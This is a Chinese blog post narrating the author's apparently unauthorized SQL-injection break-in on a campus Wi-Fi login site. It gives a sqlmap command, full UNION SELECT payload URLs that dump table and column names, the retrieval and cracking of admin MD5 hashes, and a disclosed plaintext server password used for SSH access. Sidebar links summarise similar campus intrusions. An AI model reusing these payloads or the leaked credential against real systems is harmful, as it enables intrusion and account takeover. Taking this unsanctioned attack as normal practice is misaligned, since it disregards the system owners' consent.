记一次校园网渗透经历

最新推荐文章于 2024-04-24 13:54:08 发布
最新推荐文章于 2024-04-24 13:54:08 发布
阅读量2.9k 收藏 17
点赞数 6
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43199509/article/details/106973856
版权

首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站
在这里插入图片描述
网址http://***/index.php/index/notice/id/1 点进去是一个上网须知
在这里插入图片描述
怀疑id/1中 1为注入点,上sqlmap!!

 sqlmap -u "http://***/index.php/index/notice/id/*" --level 3

跑出来发现是一个注入点
在这里插入图片描述
然后接下来 --dbs
在这里插入图片描述
得到库名后用-D radius --tables看下表,这时候已经出现一些报错了
在这里插入图片描述
用–columns看列名但是发现看不了
在这里插入图片描述
一开始以为是编码的问题,试了各种tamper,均失败。具体为什么失败还不清楚,推测可能是sqlmap构造的语句正好不能被解析,或者是由于其他后台的配置问题,直接查看sqlmap提供的payload尝试手注

sqlmap提供的payloadurl,一般是最后一个数字是回显点,如果不是多试下就行
在浏览器使用sqlmap提供的payload:

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,6666%20--%20-

在这里插入图片描述
把6666替换成user()函数,发现是一个回显点
6351,6351,6351,6666-》6351,6351,6351,user()
在这里插入图片描述
尝试使用

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,group_concat(table_name)%20from%20information_schema.tables where table_schema=database()%20--%20-

来查看所有的表
在这里插入图片描述
这里能看到很多表名,但是sqlmap跑不出来
使用-v 参数来看请求细节,发现很多请求都自动转到了登录页面
尝试查看列名

http://***/index.php/index/notice/id/')%20UNION%20ALL%20SELECT%206351,CONCAT(0x7170707a71,0x4e6c47467853666e5852614e6e625a6256474f7455556c4e717a7843686146636472506b5a657847,0x71766a7671),6351,6351,6351,group_concat(COLUMN_NAME)%20from%20information_schema.columns%20where%20table_name='E$_radusertemp'%20--%20-

在这里插入图片描述
在几次尝试后发现只能看到第一个表的列名,就是sqlmap能跑出来的唯一一个表,其他都看不到
猜测radadmin是管理员信息,但是不知道列名,只能一个个试,发现password能回显出来
在这里插入图片描述
是md5值,其中第一个和第三个放到soMD5能解密出来
在这里插入图片描述
在这里插入图片描述
其中第一个p@ss4sunrise是服务器的密码,直接拿ssh连就行了,到此完成渗透,不过还是有些问题没搞懂
1.为啥sqlmap只能跑出一个表且无法获得列名
2.为啥只能查询第一个表的列名,其他表无法查到列名但是却可以读到数据
3.总的来说还是要用sqlmap看有没有注入点,实际情况还是需要通过手注解决问题

梦想闹钟
关注
  • 6
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
校园网设计 校园网设计 校园网设计
01-10
校园网设计
我是如何一步一步渗透校园网服务器的
热门推荐
R4bbit
12-20 4万+
(1)信息收集 从校园网登录认证的web服务器入手 认证登录URL: http://10.0.0.2:9090/zportal/loginForWeb?wlanuserip=a7366ddc0f7012124df59542a882d7f2&wlanacname=c26c295bb262381f&ssid=&nasip=3dac9c253b8a73863be917b781d
1day 锐捷校园网自助服务系统存在SQL注入漏洞-新街口
weixin_43167326的博客
04-24 965
锐捷校园网自助服务系统是为学校网络管理而设计的平台,提供网络账号管理、流量查询、上网认证、网络报修和网络使用规则说明等功能,以提高学校网络管理效率,方便用户管理和使用校园网络资源、
某校园内网渗透测试
qq_28624871的博客
05-10 3553
信息收集   一、基础信息 目标系统是windows, 服务层有IIs6.0,Apache-Web-Server, 支撑层有ASP.NET,ASP,jQuery,VisualSVN,PHP5.2.6   二、端口开放情况: 利用goby对ip进行扫描,使用nmap工具也同样能扫出所有开放的端口   三、资产探测: 结合goby和nmap扫描的端口情况,手工探测了下,发现总共有5个web应用,以及开放了MySQL、RDP服务。 端口 应用 运行环境 备注 501 WEB:xxxxxxx网络课
对于某高校网站的渗透测试
rumil的博客
06-03 2013
根据分析源码,该压缩包上传会被解压,解压后,文件夹会被拆开,然后拼接成文件,拼接的文件为文件夹(XX_Html)名中的XX+文件原来的名称。执行删除的操作,观察url信息变化,抓包抓取数据信息,修改数据包,尝试sql注入。在后台的学生管理,成绩管理,教师管理,文章管理等多处,存在xss跨站脚本攻击。接下来到文件上传点,鼠标右键点击检查,查看代码,找到文件的上传点,访问试试。通过爆破的目录,我们可以发现,目录下有一个压缩包,我们尝试下载。上传文件,验证是否能被解析,写入一个木马,直接进行连接。
网络渗透第二讲(校园网与手机热点的区别)
qq_74012690的博客
11-12 216
思考总结:VM中的桥接模式,其实就是相当于把虚拟机当成一个新的电脑,与自己的主机无任何关联,通俗的来说,大家在校园的时候使用校园网时是需要登陆的,这个登陆校园网就相当于把自己的设备在校园网系统里面报备注册,这样系统才会给你的设备ip,而虚拟机的物理地址并不在注册列表中,所以学校校园网便会把虚拟机网络连接给ban了,而手机热点并没有做出这些限制,因此校园网的这种做法其实一定程度上保护了大家的隐私安全。物理机连接手机热点,Kali中查看网络配置并截图,能获得IP地址吗?我们惊喜的发现,kali获得了ip!
关于学校网的渗透与入侵
m0_72703340的博客
02-11 1774
学校漏洞扫描(不进行任何非法用途)
ensp构建一个小型校园网
最新发布
06-27
ensp构建一个小型校园网
Cisco Packet Tracer 典型校园网设计
04-06
这是一个基于中小型校园网的网络搭建设计,使用Packet Tracer模拟器实现网络配置,并应用多种关键技术。其中,使用了VLAN技术实现了学校部门间的网段隔离;使用链路聚合提高了核心层的网络带宽与稳定性;使用RSTP...
无线网络产品在校园网的应用
01-10
利用它也可以很快地将一个本来是用于其他目的的教室变成一个临时测试中心或一周只使用一次的教室,省去了布线的费用以及所耗精力。 五、无线网络产品在校园网应用的典型配置图 无线网络产品在校园网应用的典型配置...
计算机网络cisco校园网搭建.rar
06-12
实现学校对教学楼,图书馆,学生宿舍,二级学院的统一高效的网络管理,搭建校级行政管理系统。
一次校园网渗透测试(水平越权可获取全年级成绩)
weixin_42729141的博客
05-29 1099
发现校园网的水平越权漏洞,并使用python中的request库构造请求,获取全校的成绩。
基于高校网络技术渗透
weixin_50339660的博客
07-03 452
渗透测试实验 项目场景: 某高校校园网渗透项目 nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.92.1/24不扫描端口,来判定主机是否存活。 nmap -A -p- -T4 192.168.92.133 探测靶场突破口 开放了7744端口号,服务为ssh,80端口,服务为http 访问80端口,寻找进一步突破口,直接使用ip访问会跳转到http://dc-2/,所以添加hosts文件,让这个跳转域名来访问靶场ip 在/etc
网络安全渗透测试实验一
qq_60905276的博客
11-05 4777
理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。系统环境:Kali Linux 2、Windows网络环境:交换网络结构实验工具: Metasploitable2(需自行下载虚拟机镜像);Nmap(Kali);WinHex、数据恢复软件等1、用搜索引擎Google或百度搜索麻省理工学院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面。
无限渗透实战(2)--绕过认证上校园网
azraelxuemo的博客
08-20 1万+
然后再分享一个例子 前端时间我研究的时候,楼上有个wifi是不需要密码,但连上了以后上不了网,也没有cmcc那种认证 这也是一个比较常见的自认为安全的方式,他的原理就是他限制了mac地址,只有这几个mac地址可以上网,其他的不可以 但自以为安全的他有很大的漏洞 ip link set enp4s0f1 name eth0 首先我也是 airodump-ng --bssid 11:25:93:DB:CD:5A -c 12 wlan0mon 类似的命令去监听,然后发现有一个小可爱在使用,然后果断复制mac
如何通过计算机侵入学校网络,简单的局域网入侵方法(特别适合于校园网络)...
weixin_39683241的博客
06-21 1万+
对于局域网入侵,一般无需任务工具软件,特别是校园的实验室网络,完全可以利用系统本身的工具来实现。在运行中输入cmd,然后输入netview即可查看局域网内的所有计算机,由于默认的telnet服务没有开启,因此在telnet远程主机之前,我们需要开启telnet服务。在计算机管理中选择连接到远程主机,然后输入用户名和密码即可连接至远程主机,然后在程序与服务中开启远程主机的telnet服务,现在我们就...
一次对学校网站的渗透
袁统的博客
11-14 3382
一、信息收集 首先对网站的信息进行判断,可以很明显的判断出来是dedecms(织梦) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GRcQTfH2-1636897243066)(https://i.loli.net/2020/03/31/Gutibw2A85VC34q.png)] 鉴于织梦的漏洞比较多,我们先对网站的信息进行一下收集,再进行下一步的操作。在这里我们可以判断网站使用了安全狗的防护。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-
实战|渗透学校某内网服务器
zhangge3663的博客
02-01 4658
”黑“掉自己的学校,可能是大多数黑阔们学生时代共同的执念。 前言: 心血来潮,突然想看看学校有没有能用永恒之蓝打下来的机器,顺便来一波内网渗透,想想上一次测试还是刚爆出永恒之蓝的利用工具的时候,那时候msf都还没整合进去,现在直接就能用msf方便多了。 信息收集: 已知 10.10.10.0/24 为学校各种服务器使用的IP 使用MSF中的批量ms17_010验证模块: msf5 > use auxiliary/scanner/smb/smb_ms17_010 msf5 auxili.
[xueqi]在校园内网中的一次简单渗透测试
XUEQI的博客
10-12 2695
首先设备接入在学校内网,lan网络的掩码是255.255.252.0 我的ip为10.3.16.* 开启扫描器扫了一遍自己网段机器,由于周末发现存活的ip很少,果断扩大扫描网络,增加网络号区间。 一通扫描发现大量的存活的主机,对几个常用端口扫描,发现几个投影仪存活,存在80端口,小伙伴简单研究下,发现web控制界面弱口令,然后可以进行开关机,调节参数等权限。 还发现大量开启135,138,1...
XX大学计算机校园网一期工程(LNUNET)投标书.doc
12-16
XX大学计算机校园网一期工程(LNUNET)投标书.doc

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值